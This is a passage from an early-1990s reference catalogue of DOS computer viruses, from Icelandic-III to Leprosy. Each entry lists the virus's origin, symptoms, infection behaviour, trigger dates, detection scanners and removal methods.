       Also see: Icelandic, Icelandic-III, Mix/1, Saratoga


 Virus Name:  Icelandic-III
 Aliases:     December 24th
 V Status:    Endangered
 Discovered:  December, 1989
 Symptoms:    .EXE growth, Resident TOM, bad sectors, FAT corruption,
              Dec 24 message.
 Origin:      Iceland
 Eff Length:  853 Bytes
 Type Code:   PRfE - Parasitic Resident .EXE Infector
 Detection Method:  ViruScan/X V67+, F-Prot, IBM Scan, Pro-Scan, VirexPC,
              AVTK 3.5+, VirHunt 2.0+
 Removal Instructions: F-Prot, Scan/D/X, Pro-Scan 1.4+, VirexPC 1.1B,
              VirHunt 2.0+, or delete infected files
 General Comments:
       The Icelandic-III Virus is a modified version of the Icelandic
       Virus, and was isolated for the first time in December 1989 in
       Iceland.  These two viruses are very similar, so only the
       changes to this variant are indicated here, refer to Icelandic
       for the base virus information.

       The Icelandic-III virus's id string in the last 2 words of the
       program is hex '1844,195F', the bytes in each word being
       reversed from the id string ending the Icelandic and
       Icelandic-II viruses.  There are also other minor changes to
       the virus from the previous Icelandic viruses, including the
       addition of several NOP instructions.

       Before the virus will infect a program, it checks to see if the
       program has been previously infected with Icelandic or
       Icelandic-II, if it has, it does not infect the program.
       Files infected with the Icelandic-III virus will have their
       length increased by between 848 and 863 bytes.

       If an infected program is run on December 24th of any year,
       programs subsequently run will be stopped, later displaying
       the message "Gledileg jol" ("Merry Christmas" in Icelandic)
       instead.

       Also see: Icelandic, Icelandic-II, Mix/1, Saratoga


 Virus Name:  IKV 528
 Aliases:
 V Status:    New
 Discovered:  January, 1991
 Symptoms:    .COM & .EXE growth
 Origin:      Unknown
 Eff Length:  528 Bytes
 Type Code:   PNCK - Parasitic Non-Resident .COM Infector
 Detection Method:  ViruScan V74+
 Removal Instructions: Scan/D, or Delete infected files
 General Comments:
       The IKV 528 Virus was submitted in January, 1991, its origin and
       isolation point are unknown.  This virus is a non-resident infector
       of .COM files.  It will infect COMMAND.COM.

       When a program infected with IKV 528 is executed, the virus will
       infect two .COM programs in the current directory.  .COM programs which
       are smaller than 520 bytes will not be infected.  Infected .COM
       programs will increase in length by 528 bytes.  The virus will be
       located at the end of infected programs.  The file date and time in the
       disk directory will not be altered by the virus.

       This virus does not do anything besides replicate.


 Virus Name:  Invader
 Aliases:     Plastique Boot
 V Status:    Common
 Discovered:  September, 1990
 Symptoms:    TSR; .COM & .EXE growth; BSC; music
 Origin:      Taiwan/China
 Eff Length:  4,096 Bytes
 Type Code:   PRsAB - Parasitic Resident .COM, .EXE, & Boot Sector Infector
 Detection Method:  ViruScan V67+, Pro-Scan 2.01+
 Removal Instructions: Scan/D, CleanUp V67+, or Delete infected files
 General Comments:
       The Invader Virus was isolated in September, 1990 in China.
       This virus is a later version of the Plastique-B or Plastique 5.21
       Virus.  It is a memory resident infector of .COM and .EXE files,
       but not COMMAND.COM.  It also infects boot sectors.  In September
       1990, many reports of infections of this virus have been received,
       it appears to have spread very rapidly.

       The first time a program infected with the Invader virus is
       executed, the virus will install itself memory resident as a low
       system memory TSR.  The TSR is 5,120 Bytes and interrupts 08, 09,
       13, and 21 will be hooked.

       At this time, the virus will also infect the boot sector of the drive
       where the infected program was executed.  The new boot sector is an
       MSDOS 3.30 boot sector, and can be easily identified because the
       normal DOS error messages found in the boot sector are now at the
       beginning of the boot sector instead of the end.

       After the virus has become memory resident, any .COM or .EXE file
       (with the exception of COMMAND.COM) openned will be infected by the
       virus.  Infected .COM files will increase in length by 4,096 bytes
       with the viral code being located at the beginning of the infected
       file.  .EXE files will increase in length between 4,096 and 4,110
       bytes with the viral code being located at the end of the infected
       file.

       Additionally, any non-write protected diskettes which are exposed to
       the infected system will have their boot sectors infected.

       The Invader Virus activates after being memory resident for
       30 minutes.  At that time, a melody may be played on the system
       speaker.  On systems which play the melody, it will continue until
       the system is rebooted.  The melody isn't played on 286 based systems,
       but is noticeable on the author's 386SX test machine.

       Also see: Plastique, Plastique-B


 Virus Name:  Iraqui Warrior
 Aliases:     Iraqui
 V Status:    New
 Discovered:  January, 1991
 Symptoms:    .COM growth; Closely spaced beeps from system speaker;
              system hangs; boot failures
 Origin:      USA
 Eff Length:  777 Bytes
 Type Code:   PNCK - Parasitic Non-Resident .COM Infector
 Detection Method:  ViruScan V74+
 Removal Instructions: Scan/D, or Delete infected files
 General Comments:
       The Iraqui Warrior Virus was isolated on January 17, 1991 in the
       United States.  This virus is a non-memory resident infector of .COM
       files, including COMMAND.COM.  It is based on the Vienna Virus.

       When a program infected with the Iraqui Warrior Virus is executed, the
       virus will infect one of the first four .COM files located on the
       current drive and current directory.  Infected .COM files will have
       a file length increase of 777 bytes with the virus being located at the
       end of the file.

       The following text strings can be found in infected files, the first
       two occurring near the beginning of the virus, and the last being
       located very near the end of the infected file:

               "I come to you from The Ayatollah!"
               "(c)1990, VirusMasters"
               "An Iraqui Warrior is in your computer..."

       None of these messages are displayed by the virus.

       Systems infected with the Iraqui Warrior virus may occassionally
       experience the system speaker issuing a series of closely spaced beeps
       when an infected program is executed.  When this occurs, the system
       will hang and have to be rebooted.  The beeps continue until the reboot
       occurs.

       Booting from a disk where COMMAND.COM has been infected will result in
       a "Memory allocation error, Cannot start COMMAND, exiting" message
       appearing.

       The Iraqui Warrior does not appear to do anything else besides the
       above.


 Virus Name:  Itavir
 Aliases:     3880
 V Status:    Endangered
 Discovered:  March, 1990
 Symptoms:    .EXE growth, COMMAND.COM file, Boot sector corruption
 Origin:      Italy
 Eff Length:  3,880 Bytes
 Type Code:   PNE - Parasitic Non-Resident .EXE Infector
 Detection Method:  ViruScan V60+, Pro-Scan 1.4+
 Removal Instructions: Scan/D, or delete infected files
 General Comments:
       The Itavir virus was isolated in March 1990 by a group of
       students at the Milan Politechnic in Milan, Italy.  The Itavir
       virus is a non-resident generic .EXE Infector.  Infected files
       will increase in length by 3,880 bytes.  Infected systems,
       besides having files which have increased in length, will
       usually have a file with the name COMMAND.COM somewhere on
       the disk.  The first character of this file name is an
       unprintable character.  The COMMAND.COM file contains the
       pure virus code and is used for appending to files as they
       are infected.

       The Itavir virus activates at some time period after the system
       has been running for more than 24 hours.  When it activates, the
       boot sector is corrupted, rendering the system unbootable.  The
       virus also displays a message in Italian and writes ansi values
       from 0 thru 255 to all available I/O ports, thus confusing any
       attached peripheral devices.  Some monitors may show a flickering
       effect when this occurs, while some VGA monitors may actually
       "hiss".


 Virus Name:  Jeff
 Aliases:
 V Status:    Rare
 Discovered:  December, 1990
 Symptoms:    .COM growth; overwritten sectors on hard disk
 Origin:      USA
 Eff Length:  814 Bytes
 Type Code:   PNCK - Parasitic Non-Resident .COM Infector
 Detection Method:  ViruScan V72+, Pro-Scan 2.01+
 Removal Instructions:  Scan/D, or Delete infected files
 General Comments:
       The Jeff Virus was isolated in the United States in December, 1990.
       This virus is a non-resident infector of .COM files, including
       COMMAND.COM.

       When a program infected with the Jeff Virus is executed, the virus
       will attempt to infect one .COM file on the C: drive, starting in
       the root directory.  Infected .COM files will increase in size by
       814 to 828 bytes, with the virus being located at the end of the
       infected program.

       The Jeff Virus received its name from the following text string which
       is encrypted in the viral code:

               "Jeff is visiting your hard disk"

       While Jeff is visiting your hard disk, it will occasionally write
       some sectors of random memory contents to the hard disk.  If these
       sectors are written to the boot sector, partition table, or FAT, the
       contents of the disk may become inaccessible or produce unexpected
       results.


 Virus Name:  Jerusalem
 Aliases:     PLO, Israeli, Friday 13th, Russian, 1813(COM), 1808(EXE)
 V Status:    Common
 Discovered:  October, 1987
 Symptoms:    TSR, .EXE & .COM growth, system slowdown, deleted files
              on Friday 13th, "Black WIndow"
 Origin:      Israel
 Eff Length:  1,813 (COM files) & 1,808 (EXE files) bytes
 Type Code:   PRsA - Parasitic Resident .COM & .EXE Infector
 Detection Method:  ViruScan, F-Prot, IBM Scan, Pro-Scan, VirexPC 1.1+,
              AVTK 3.5+, VirHunt 2.0+
 Removal Instructions:  Scan/D/A, Saturday, CleanUp, UnVirus, F-Prot,
              VirexPC 1.1+, Pro-Scan 1.4+
 General Comments:
       The Jerusalem Virus was originally isolated at Hebrew
       University in Israel in the Fall of 1987.  Jerusalem is a memory
       resident infector of .COM and .EXE files, with .EXE file being
       reinfected each time they are executed due to a bug in the
       virus.

       This virus redirects interrupt 8, and 1/2 hour after execution
       of an infected program the system will slow down by a factor
       of 10.  Additionally, some Jerusalem Virus variants will have a
       "Black Window" or "Black Box" appear on the lower left side of
       the screen which will scroll up the screen as the screen scrolls.

       On Friday The 13ths, after the virus is installed in memory,
       every program executed will be deleted from disk.

       The identifier for some strains is "sUMsDos", however,
       this identifier is usually not found in the newer variants of
       Jerusalem.

       The Jerusalem Virus is thought to have been based on the Suriv 3.00
       Virus, though the Suriv 3.00 Virus was isolated after the Jerusalem
       Virus.

       Also see: Jerusalem B, New Jerusalem, Payday, Suriv 3.00


 Virus Name:  Jerusalem B
 Aliases:     Arab Star, Black Box, Black Window, Hebrew University
 V Status:    Common
 Discovered:  January, 1988
 Symptoms:    TSR, .EXE & .COM growth, system slowdown, deleted files
              on Friday 13th, "Black WIndow"
 Origin:      Israel
 Eff Length:  1,813 (.COM files) & 1,808 (.EXE files) bytes
 Type Code:   PRsA - Parasitic Resident .COM & .EXE Infector
 Detection Method:  ViruScan, F-Prot, IBM Scan, Pro-Scan, VirexPC 1.1+,
              AVTK 3.5+, VirHunt 2.0+
 Removal Instructions:  F-Prot, Saturday, CleanUp, UnVirus, VirexPC 1.1+
              Pro-Scan 1.4+
 General Comments:
       Identical to the Jerusalem virus, except that in some cases
       it does not reinfect .EXE files.  Jerusalem B is the most
       common of all PC viruses, and can infect .SYS and program
       overlay files in addition to .COM and .EXE files.

       Not all variants of the Jerusalem B virus slow down the
       system after an infection has occurred.

       Also, it should be noted that Jerusalem viruses will only activate
       if they actually become memory resident on their activation date.  If
       the system clock rolls over to the activation date and the virus is
       already memory resident, they will not typically activate and perform
       any destructive behavior they may be intended to perform.

       Known variants of Jerusalem B are:
       A-204      : Jerusalem B with the sUMsDos text string changed to
           *A-204*, and a couple of instructions changed in order to
           avoid detection.  This variant will slow down the system
           after being memory resident for 30 minutes, as well as having
           a black box appear at that time.
           Origin: Delft, The Netherlands
       Anarkia    : Jerusalem B with the timer delay set to slow
           down the system to a greater degree, though this effect
           doesn't show until a much longer time has elapsed.  No
           Black Box is never displayed.  The sUMsDos id-string has
           been changed to ANARKIA.  Lastly, the virus's activation
           date has been changed to Tuesday The 13ths, instead of
           Friday The 13ths.  Origin: Spain
       Anarkia-B  : Similar to Anarkia, with the exception that the
           virus now activates on any October 12th instead of on
           Tuesday The 13ths.
       Jerusalem-C: Jerusalem B without the timer delay to slow
           down the processor.
       Jerusalem-D: Jerusalem C which will destroy both copies of
           the FAT on any Friday The 13th after 1990.
       Jerusalem-E: Jerusalem D but the activation is in 1992.
       Mendoza    : Based on the Jerusalem B virus, this variant does
           not reinfect .EXE files.  It is also missing the black box
           effect.  Mendoza activates in the second half of the year
           (July - December), at which time any day will have a 10%
           chance of having all programs executed deleted.
           Origin: Argentina
       Park ESS: Isolated in October, 1990 in Happy Camp, California, this
           variant is very similar to other Jerusalem viruses.  Infected
           .COM files increase in length by 1,813 bytes, and infected .EXE
           files will increase in length by 1,808 to 1,822 bytes with the
           first infection, and 1,808 on later subsequent infections.  This
           variant will also infect COMMAND.COM.  The other major difference
           from the "normal" Jerusalem is that the sUMsDos string has been
           replaced.  The string PARK ESS can be found in the viral code
           within all infected files.  This variant slows down the system
           by approximately 20 percent and a "black window" will appear after
           the virus has been memory resident for 30 minutes.
       Puerto  : Isolated in June, 1990 in Puerto Rico, this variant is
           very similar to the Mendoza variant, the virus contains the
           sUMsDos id-string.  .EXE files may be infected multiple times.
       Skism-1 : Isolated in December, 1990 in New York State, this variant
           is similar to many other Jerusalems except with regards to when
           and what it does upon activation.  Rather than activate on
           Friday The 13ths and delete files, this variant activates in the
           years 1991 and later on any Friday which occurs after the 15th of
           the month.  On activation, it truncates any file which is attempted
           to be executed to zero bytes.  COM files will increase in size
           upon infection by 1,808 bytes, EXE files will increase by 1,808 to
           1,822 bytes.  EXE files will be reinfected by the virus.  The
           sUMsDos string in the virus is now SKISM-1.  Like Jerusalem, this
           variant produces a "black window" 30 minutes after becoming
           memory resident, and also slows down the system.
       Spanish JB : Similar to Jerusalem, it reinfects .EXE files.
           The increased file size on .COM files is always 1,808
           bytes.  On .EXE files, the increased file size may be
           either 1,808 or 1,813, with reinfections always adding
           1,808 bytes to the already infected file.  No "Black
           Box" appears.  The characteristic sUMsDos id-string does
           not appear in the viral code.  This variant is also sometimes
           identified as Jerusalem E2.  Origin: Spain
       Jerusalem DC: Similar to Jerusalem B, this variant has the sUMsDos
           text string changed to 00h characters.  After being memory resident
           for 30 minutes, the system will slow down by 30% and the common
           "black window" will appear on the lower left side of the screen.
           Like Jerusalem, it will infect .EXE files multiple times.  This
           variant does not carry an activation date when it will delete
           files, it appears for all intents to be "defanged".
           Origin: Washington, DC, USA

       Also see: Jerusalem, Frere Jacques, New Jerusalem, Payday,
                 Suriv 3.00, Westwood


 Virus Name:  JoJo
 Aliases:
 V Status:    Rare
 Discovered:  May, 1990
 Symptoms:    .COM growth, system hangs
 Origin:      Israel
 Eff Length:  1,701 Bytes
 Type Code:   PRaC - Parasitic Resident .COM Infector
 Detection Method:  ViruScan V63+, Pro-Scan 1.4+, VirexPC, F-Prot 1.12+
 Removal Instructions: Scan/D, F-Prot 1.12+, Pro-Scan 2.01+
 General Comments:
       The JoJo virus was discovered in Israel in May, 1990.  The virus'
       name comes from a message within the viral code:

          "Welcome to the JOJO Virus."

       One other message appears within the virus, indicating that it was
       written in 1990.  This message is: "Fuck the system (c) - 1990".
       Both messages within the viral code are never displayed.

       When the first file infected with the JoJo Virus is executed on a
       system, the virus will install itself memory resident.  The
       method used is to alter the Command Interpreter in memory,
       expanding its size.  As an example, on my test system, the
       Command Interpreter in memory increased in size from 3,536 bytes
       to 5,504 bytes.  One block of 48 bytes is also reserved in
       available free memory.  The change in free memory will
       be a net decrease of 2,048 bytes.

       The JoJo Virus will not infect files if interrupt 13 is in use
       by any other program.  Instead the virus will clear the screen,
       and the system will be hung.  If the user performs a warm reboot
       (Ctrl-Alt-Del), the virus will remain in memory.

       Once the virus is able to become memory resident with interrupt 13
       hooked, any .COM file executed will be infected by the virus.
       Infected files will increase in length by 1,701 bytes.

       While this virus has the same length as the Cascade/1701 Virus, it
       is not a variant of Cascade.

       Also see: JoJo 2


 Virus Name:  JoJo 2
 Aliases:
 V Status:    New
 Discovered:  January, 1991
 Symptoms:    .COM growth; Message; "Not enough memory" errors; system hangs;
              cursor position off 1 character
 Origin:      United States
 Eff Length:  1,703 Bytes
 Type Code:   PRaCK - Parasitic Resident .COM Infector
 Detection Method:
 Removal Instructions: Delete infected files
 General Comments:
       The JoJo 2 Virus was submitted in January, 1991, by David Grant of the
       United States.  This virus is based on the JoJo Virus as well as
       containing part of the decryption string for the Cascade Virus.  It is
       a memory resident infector of .COM files, including COMMAND.COM.

       The first time a program infected with the JoJo 2 Virus is executed,
       the virus will install itself memory resident by altering the command
       interpretor in memory.  The command interpretor in memory will have a
       size increase of 1,904 bytes.  There is an additional 48 bytes which is
       reserved by the virus as well, similar to JoJo.

       Once the virus is memory resident, it will infect .COM files as they
       are executed.  If COMMAND.COM is executed for any reason, it will become
       infected.  Infected .COM programs will have a file size increase of
       1,703 bytes with the virus being located at the end of the infected
       file.

       Text strings which can be found in files infected with the JoJo 2 Virus
       are:

               "The JOJO virus strikes again.xxxxxxxxxxxx zzz"
               "Fuck the system 1990 - (c)"
               "141$FLu"

       Systems infected with the JoJo 2 virus may experience system hangs
       when some infected programs are executed.  Infected programs may also
       display the "Fuck the system 1990 - (c)" string, or a string of garbage
       characters from memory.  Attempts to execute some programs may also
       fail due to "Not enough memory" errors.  Lastly, after the virus has
       been resident for awhile, the user may notice that the cursor on the
       system monitor is off by one position to the right from where it should
       be.

       JoJo 2 may be detected by some anti-viral utilities as an infection
       of JoJo and Cascade/1701/1704.

       Also see: JoJo


 Virus Name:  Joker
 Aliases:     Jocker
 V Status:    Extinct
 Discovered:  December, 1989
 Symptoms:    Messages, .EXE/.DBF growth
 Origin:      Poland
 Eff Length:  ??? Bytes
 Type Code:   PNE - Parasitic Non-Resident .EXE Infector
 Detection Method:  ViruScan/X V67+, Pro-Scan, VirexPC
 Removal Instructions: Scan/D/X, or delete infected files
 General Comments:
       The Joker Virus was isolated in Poland in December, 1989.
       This virus is a generic .EXE file infector, and is a poor
       replicator (ie. it does not quickly infect other files).

       Programs which are infected with the Joker virus will
       display bogus error messages and comments.  These messages
       and comments can be found in the infected files at the
       beginning of the viral code.  Here are some of the
       messages and comments that may be displayed:

       "Incorrect DOS version"
       "Invalid Volume ID Format failure"
       "Please put a new disk into drive A:"
       "End of input file"
       "END OF WORKTIME.  TURN SYSTEM OFF!"
       "Divide Overflow"
       "Water detect in Co-processor"
       "I am hungry! Insert HAMBURGER into drive A:"
       "NO SMOKING, PLEASE!"
       " Thanks."
       "Don't beat me !!"
       "Don't drink and drive."
       "Another cup of cofee ?"
       " OH, YES!"
       "Hard Disk head has been destroyed. Can you borow me your one?"
       "Missing light magenta ribbon in printer!"
       "In case mistake, call GHOST BUSTERS"
       "Insert tractor toilet paper into printer."

       This virus may also alter .DBF files, adding messages to
       them.

       The sample in the author of this listing possession does not
       replicate on an 8088 based system.  This entry has been included
       since the sample may have been damaged before its receipt by
       the author.  At best, there is a serious bug in the replication
       portion of this virus which prevents it from replicating.


 Virus Name:  Joshi
 Aliases:     Happy Birthday Joshi, Stealth Virus
 V Status:    Common
 Discovered:  June, 1990
 Symptoms:    BSC, machine hangs and message
 Origin:      India
 Eff Length:  N/A
 Type Code:   BRX - Resident Boot Sector/Partition Table Infector
 Detection Method:  ViruScan V64+, Pro-Scan 1.4+
 Removal Instructions:  CleanUp V66+, Pro-Scan 1.4+, RmJoshi,
              or Low-Level Format Harddisk and DOS SYS floppies
 General Comments:
       The Joshi Virus was isolated in India in June 1990.  At the time it was
       isolated, it was reported to be widespread in India as well as
       portions of the continent of Africa.  Joshi is a memory resident
       boot sector infector of 5.25" diskettes.  It will also infect
       hard disks, though in the case of hard disks it infects the partition
       table or master boot sector rather than the boot sector (sector 0).

       After a system has been booted from a Joshi-infected diskette, the
       virus will be resident in memory.  Joshi takes up approximately
       6K of system memory, and infected systems will show that total
       system memory is 6K less than is installed if the DOS CHKDSK program
       is run.

       Joshi has some similarities to two other boot sector infectors.
       Like the Stoned virus, it infects the partition table of hard disks.
       Similar to the Brain virus's method of redirecting all attempts to
       read the boot sector to the original boot sector, Joshi does this with
       the partition table.

       On January 5th of any year, the Joshi virus activates.  At that
       time, the virus will hang the system while displaying the message:

             "type Happy Birthday Joshi"

       If the system user then types "Happy Birthday Joshi", the system
       will again be usable.

       This virus may be recognized on infected systems by powering off
       the system and then booting from a known-clean write-protected
       DOS diskette.  Using a sector editor or viewer to look at the
       boot sector of suspect diskettes, if the first two bytes of the
       boot sector are hex EB 1F, then the disk is infected.  The EB 1F
       is a jump instruction to the rest of the viral  code. The remainder
       of the virus is stored on track 41, sectors 1 thru 5 on 360K
       5.25 inch Diskettes.  For 1.2M 5.25 inch diskettes, the viral code
       is located at track 81, sectors 1 thru 5.

       To determine if a system's hard disk is infected, you must look at
       the hard disk's partition table.  If the first two bytes of the
       partition table are EB 1F hex, then the hard disk is infected.  The
       remainder of the virus can be found at track 0, sectors 2 thru 6.
       The original partition table will be a track 0, sector 9.

       The Joshi virus can be removed from an infected system by first
       powering off the system, and then booting from a known-clean, write-
       protected master DOS diskette.  If the system has a hard disk, the
       hard disk should have data and program files backed up, and the
       disk must be low-level formatted.  As of July 15, 1990, there are
       no known utilities which can disinfect the partition table of the
       hard disk when it is infected with Joshi.  Diskettes are easier to
       remove Joshi from, the DOS SYS command can be used, or a program
       such as MDisk from McAfee Associates, though this will leave the
       viral code in an inexecutable state on track 41.


 Virus Name:  July 13TH
 Aliases:
 V Status:    Endangered
 Discovered:  April, 1990
 Symptoms:    .EXE file growth, screen effects on July 13
 Origin:      Madrid, Spain
 Eff Length:  1,201 Bytes
 Type Code:   PNE - Parasitic Non-Resident .EXE Infector
 Detection Method:  ViruScan V64+, VirexPC, F-Prot 1.12+
 Removal Instructions: Scan/D, F-Prot 1.12+, or delete infected files
 General Comments:
       The July 13TH Virus was isolated in Madrid, Spain, in April 1990
       by Guillermo Gonzalez Garcia.  This virus is a generic .EXE file
       infector, and is not memory resident.

       When a program infected with the July 13TH Virus is executed, the
       virus will attempt to infect a .EXE file.  Files are only infected
       if they are greater in length than 1,201 bytes.  Infected files
       increase in size by 1,201 to 1,209 bytes.

       The July 13TH Virus activates on July 13th of any year.  At that
       time, a bouncing ball effect occurs on the system monitor's screen
       similar to the bouncing ball effect of the Ping Pong virus.  While
       this virus is disruptive, it does not cause any overt damage to
       files other than infecting them.  The bouncing ball effect created
       by this virus will occasionally leave dots on the screen where
       it was passing if the screen has been scrolled for any reason.
 

 Virus Name:  June 16TH
 Aliases:     Pretoria
 V Status:    Endangered
 Discovered:  April, 1990
 Symptoms:    .COM file growth, long disk accesses, June 16th FAT alteration
 Origin:      Republic of South Africa
 Eff Length:  879 Bytes
 Type Code:   PNC - Parasitic Non-Resident .COM Infector
 Detection Method:  ViruScan V62+, Pro-Scan 1.4+, VirexPC, AVTK 3.5+,
              F-Prot 1.12+, VirHunt 2.0+
 Removal Instructions: VirHunt 2.0+, Scan/D, Pro-Scan 2.01+
 General Comments:
       The June 16TH, or Pretoria, virus was discovered in April 1990.
       This virus is a non-resident generic .COM file infector, and is
       encrypted.  The first time an infected file is executed, the virus
       will search the current drive (all directories) and infect all
       .COM files found.  The search period can be quite long, and it is
       very obvious on hard disk based systems that the program is taking
       too long to load.

       On June 16TH of any year, the first time an infected file is
       executed the virus will activate.  On activation, the virus will
       change all entries in the root directory and the file allocation
       table to "ZAPPED".

       The June 16TH virus is thought to have originated in South
       Africa.


 Virus Name:  Kamikazi
 Aliases:
 V Status:    Endangered
 Discovered:  August, 1990
 Symptoms:    program corruption, system hangs, system reboots
 Origin:      Bulgaria
 Eff Length:  4,031 Bytes
 Type Code:   ONE - Overwriting Non-Resident .EXE Infector
 Detection Method: Pro-Scan 2.01+
 Removal Instructions: Delete infected files
 General Comments:
       The Kamikazi Virus was submitted by Vesselin Bontchev of Bulgaria in
       August, 1990.  This virus is a non-resident overwriting virus, and
       infects .EXE files.

       When a program infected with the Kamikazi virus is executed, the virus
       will infect another .EXE file in the current directory if the .EXE
       file's length is greater than 4,031 bytes.  Kamikazi simply overwrites
       the first 4,031 bytes of the candidate program with its viral code,
       thus permanently damaging the candidate program being infected.  The
       original 4,031 bytes of code is not stored at any other location.
       Infected files do not change in length.

       After infecting another .EXE program, the virus will then change the
       first 8 bytes of the infected program that was executed to
       "kamikazi", thus the virus's name.  At this point, one of several
       symptoms may appear: the system may be rebooted by the virus, some
       of the contents of memory may get displayed on the screen, or the
       program may complete execution having appeared to have done nothing
       at all.  In any event, the original executed program will never run
       successfully, doing what the user expects.

       If the infected program is executed a second time, it will hang the
       system since it is no longer an executable program.  The .EXE header
       has been permanently damaged due to the first 8 characters having been
       changed to "kamikazi" by the virus when it was first executed.


 Virus Name:  Kemerovo
 Aliases:     USSR 257
 V Status:    Rare
 Discovered:  December, 1990
 Symptoms:    .COM growth; ????????COM Path not found." message;
              file date/time changes
 Origin:      USSR
 Eff Length:  257 Bytes
 Type Code:   PNCK - Parasitic Non-Resident .COM Infector
 Detection Method:  ViruScan V74+
 Removal Instructions: Scan/D, or Delete infected files
 General Comments:
       The Kemerovo Virus was submitted in December, 1990 and is from the
       USSR.  This virus is a non-resident direct action infector of .COM
       files, including COMMAND.COM.

       When a program infected with the Kemerovo Virus is executed, the virus
       will search the current drive and directory for a .COM program to
       infect.  If an uninfected COM program is found, the virus will infect
       it, adding its viral code to the end of the original program.  The
       newly infected program's date and time in the disk directory will also
       be updated to the current system date and time of infection.  Infected
       programs will increase in length by 257 bytes.

       If an uninfected .COM file was not found in the current directory, the
       message "????????COM Path not found" may be displayed and the program
       the user is attempting to execute will be terminated.

       Kemerovo does not do anything besides replicate.

 
 Virus Name:  Kennedy
 Aliases:     Dead Kennedy, 333
 V Status:    Endangered
 Discovered:  April, 1990
 Symptoms:    .COM growth, message on trigger dates (see text),
              crosslinking of files, lost clusters, FAT corruption
 Origin:      Denmark
 Eff Length:  333 Bytes
 Type Code:   PNCKF - Parasitic Non-Resident .COM Infector
 Detection Method:  ViruScan V62+, Pro-Scan 1.4+, VirexPC, F-Prot 1.12+,
              VirHunt 2.0+
 Removal Instructions: Scan/D, F-Prot 1.12+, VirHunt 2.0+,
              or delete infected files
 General Comments:
       The Kennedy Virus was isolated in April 1990.  It is a generic
       infector of .COM files, including COMMAND.COM.

       This virus has three activation dates: June 6 (assassination of
       Robert Kennedy 1968), November 18 (death of Joseph Kennedy 1969),
       and November 22 (assassination of John F. Kennedy 1963) of any
       year. On activation, the virus will display a message the following
       message:

               "Kennedy is dead - long live 'The Dead Kennedys'"

       The following text strings can be found in the viral code:
               "\command.com"
               "The Dead Kennedys"

       Systems infected with the Kennedy Virus will experience
       crosslinking of files, lost clusters, and file allocation table
       errors (including messages that the file allocation table is
       bad).


 Virus Name:  Keypress
 Aliases:
 V Status:    Common
 Discovered:  October, 1990
 Symptoms:    .COM & .EXE growth; decrease in available free memory;
              keystrokes repeated unexpectedly
 Origin:      USA
 Eff Length:  1,232 Bytes
 Type Code:   PRhAK - Parasitic Resident .COM & .EXE Infector
 Detection Method:  ViruScan V71+, Pro-Scan 2.01+
 Removal Instructions: Clean-Up V71+, or Delete infected files
 General Comments:
       The Keypress Virus was reported and isolated in many locations in the
       United States in late October, 1990.  This virus is a memory resident
       infector of .COM and .EXE files, including COMMAND.COM.

       The first time a program infected with the Keypress Virus is executed,
       the virus will install itself memory resident at the top of free
       available memory, but below the 640K DOS boundary.  Interrupts 1C and
       21 will be hooked by the virus.  Available free memory on the system
       will have decreased by 1,232 bytes.

       After the virus is memory resident, any file executed may become
       infected by the virus.  In the case of .COM files, they are only
       infected if their original file length was greater than 1,232 bytes.
       .EXE files of any length will be infected, as will COMMAND.COM if it
       is executed.  Infected programs will have their directory date/time
       changed to the system date and time when they were infected by this
       virus.  .COM files will increase in length by between 1,234 and
       1,248 bytes upon infection.  .EXE files will increase by 1,472 to
       1,486 bytes upon infection.  In either case, the virus will be located
       at the end of the infected file.

       The Keypress Virus activates after being memory resident for 30 minutes.
       Upon activation, the virus may interfer with keyboard input by repeating
       keystrokes.  For example, if "a" is entered on the keyboard, it may be
       changed to "aaaaaa" by the virus.

       Infected files can be identified by containing the following hex string
       near the end of the infected program: 4333C98E1E2901CD21.


 Virus Name:  Korea
 Aliases:     LBC Boot
 V Status:    Common - Korea
 Discovered:  March, 1990
 Symptoms:    BSC - 360k disks 
 Origin:      Seoul, Korea
 Eff Length:  N/A
 Type Code:   RF - Resident Floppy Boot Sector Infector
 Detection Method:  ViruScan V61+, VirHunt 2.0+
 Removal Instructions: M-Disk, or DOS SYS Command
 General Comments:
       The Korea, or LBC Boot, Virus was isolated in March 1990 in
       Seoul, Korea.  This virus is a memory resident boot sector
       infector for 5.25" 360K diskettes.

       The Korea virus is not intentionally destructive, it does nothing
       in its current form except for replicating.  In some instances,
       when Korea infects a diskette it will damage the root directory as
       it moves the original boot sector to sector 11, the last sector of
       the root directory.  If sector 11 previously contained directory
       entries, they will be lost.
 

 Virus Name:  Lehigh
 Aliases:     Lehigh University
 V Status:    Rare
 Discovered:  November, 1987
 Symptoms:    Corrupts boot sector & FAT
 Origin:      Pennsylvania, USA
 Eff Length:  N/A
 Type Code:   ORaKT - Overwriting Resident COMMAND.COM Infector
 Detection Method:  ViruScan, F-Prot, IBM Scan, Pro-Scan, VirexPC, AVTK 3.5+,
              VirHunt 2.0+
 Removal Instructions: MDisk & replace COMMAND.COM with clean copy, or
       F-Prot
 General Comments:
       The Lehigh virus infects only the COMMAND.COM file on both
       floppies and hard drives.  The infection mechanism is to over-
       write the stack space.  When a disk which contains an
       uninfected copy of COMMAND.COM is accessed, that disk is then
       infected.  A infection count is kept in each copy of the virus,
       and after 4 infections, the virus overwrites the boot sector and
       FATs.

       A variation of the Lehigh virus, Lehigh-2, exists which
       maintains its infection counter in RAM and corrupts the boot
       sector and FATs after 10 infections.

       Known variants of the Lehigh virus are:
       Lehigh-2 : Similar to Lehigh, but the infection counter is maintained
                  in RAM, and the corruption of the boot sector and FATs
                  occurs after 10 infections.
       Lehigh-B : Similar to Lehigh, the virus has been modified to
                  avoid detection.


 Virus Name:  Leprosy
 Aliases:     Leprosy 1.00, News Flash
 V Status:    Rare
 Discovered:  August, 1990
 Symptoms:    unusual messages; program corruption
 Origin:      California, USA
 Eff Length:  666 Bytes
 Type Code:   ONAK - Overwriting Non-Resident .COM & .EXE Infector
 Detection Method:  ViruScan/X V67+
 Removal Instructions: Scan/D/X, or Delete infected files
 General Comments:
       The Leprosy Virus was discovered in the San Francisco Bay Area of
       California on August 1, 1990.  This virus is a non-resident
       overwriting virus infecting .COM and .EXE files, including
       COMMAND.COM.  Its original carrier file is suspected to be a file
       called 486COMP.ZIP which was uploaded to several BBSes.

       When you execute a program infected with the Leprosy virus, the virus
       will overwrite the first 666 bytes of all .COM and .EXE files in
       the directory one level up from the current directory.  If the
       current directory is the root directory, all programs in the root
       directory will be infected.  If COMMAND.COM is located in the directory
       being infected, it will also be overwritten.  Infected files will show
       no file length increase unless they were originally less than 666
       bytes in length, in which case their length will become 666 bytes.

       After the virus has infected the .COM and .EXE files, it will display
       a message.  The message will be either:

               "Program to big to fit in memory"

       or:

